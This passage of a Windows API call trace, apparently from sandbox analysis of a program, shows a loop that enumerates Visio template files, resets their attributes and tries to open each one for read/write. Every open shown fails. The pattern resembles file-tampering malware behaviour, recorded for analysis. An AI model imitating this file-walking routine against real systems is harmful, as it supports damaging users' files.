[0137.949] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.949] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.949] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEFUND_U.VSS", dwFileAttributes=0x80) returned 0 [0137.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEFUND_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eefund_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.949] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.949] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.949] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.949] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.949] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEGENR_M.VST", dwFileAttributes=0x80) returned 0 [0137.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEGENR_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eegenr_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.950] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.950] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.950] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.950] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEGENR_U.VST", dwFileAttributes=0x80) returned 0 [0137.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEGENR_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eegenr_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.950] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.950] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.950] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.951] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEICS_M.VST", dwFileAttributes=0x80) returned 0 [0137.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEICS_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eeics_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.952] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.952] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.952] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.952] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.952] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEICS_U.VST", dwFileAttributes=0x80) returned 0 [0137.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEICS_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eeics_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.952] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.952] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.952] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.952] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.952] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMAIN_M.VSS", dwFileAttributes=0x80) returned 0 [0137.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMAIN_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eemain_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.953] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.953] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.953] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.953] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.953] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMAIN_U.VSS", dwFileAttributes=0x80) returned 0 [0137.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMAIN_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eemain_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.953] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.953] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.953] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.953] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMAPS_M.VSS", dwFileAttributes=0x80) returned 0 [0137.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMAPS_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eemaps_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.954] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.954] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.954] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.955] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMAPS_U.VSS", dwFileAttributes=0x80) returned 0 [0137.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMAPS_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eemaps_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.955] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.955] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.955] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.955] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMECH_M.VSS", dwFileAttributes=0x80) returned 0 [0137.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMECH_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eemech_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.955] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.955] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.956] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.956] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMECH_U.VSS", dwFileAttributes=0x80) returned 0 [0137.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEMECH_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eemech_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.956] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.956] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.956] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.956] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEPATH_M.VSS", dwFileAttributes=0x80) returned 0 [0137.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEPATH_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eepath_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.957] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.957] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.957] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.957] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEPATH_U.VSS", dwFileAttributes=0x80) returned 0 [0137.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEPATH_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eepath_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.958] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.958] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.958] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.958] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEQUAL_M.VSS", dwFileAttributes=0x80) returned 0 [0137.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEQUAL_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eequal_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.959] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.959] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.959] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.959] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEQUAL_U.VSS", dwFileAttributes=0x80) returned 0 [0137.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEQUAL_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eequal_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.959] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.959] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.959] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.960] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESEMI_M.VSS", dwFileAttributes=0x80) returned 0 [0137.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESEMI_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eesemi_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.960] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.960] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.961] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.961] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.961] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESEMI_U.VSS", dwFileAttributes=0x80) returned 0 [0137.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESEMI_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eesemi_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.961] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.961] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.961] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.961] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.961] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESWCH_M.VSS", dwFileAttributes=0x80) returned 0 [0137.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESWCH_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eeswch_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.962] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.962] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.962] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.962] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESWCH_U.VSS", dwFileAttributes=0x80) returned 0 [0137.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESWCH_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eeswch_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.962] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.962] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.962] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.962] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESYS_M.VST", dwFileAttributes=0x80) returned 0 [0137.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESYS_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eesys_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.963] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.963] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.963] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.963] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESYS_U.VST", dwFileAttributes=0x80) returned 0 [0137.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EESYS_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eesys_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.964] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.964] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.964] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.964] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETCOM_M.VSS", dwFileAttributes=0x80) returned 0 [0137.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETCOM_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eetcom_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.964] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.964] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.965] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETCOM_U.VSS", dwFileAttributes=0x80) returned 0 [0137.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETCOM_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eetcom_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.965] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.965] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETERM_M.VSS", dwFileAttributes=0x80) returned 0 [0137.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETERM_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eeterm_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.966] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.966] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETERM_U.VSS", dwFileAttributes=0x80) returned 0 [0137.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETERM_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eeterm_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.967] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.967] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.967] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.967] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETRAN_M.VSS", dwFileAttributes=0x80) returned 0 [0137.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETRAN_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eetran_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.967] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.967] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.967] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.968] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETRAN_U.VSS", dwFileAttributes=0x80) returned 0 [0137.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EETRAN_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eetran_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.968] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.968] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.968] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.968] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEVHF_M.VSS", dwFileAttributes=0x80) returned 0 [0137.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEVHF_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eevhf_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.969] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.969] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.969] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.969] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEVHF_U.VSS", dwFileAttributes=0x80) returned 0 [0137.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEVHF_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eevhf_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.970] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.970] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.970] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: 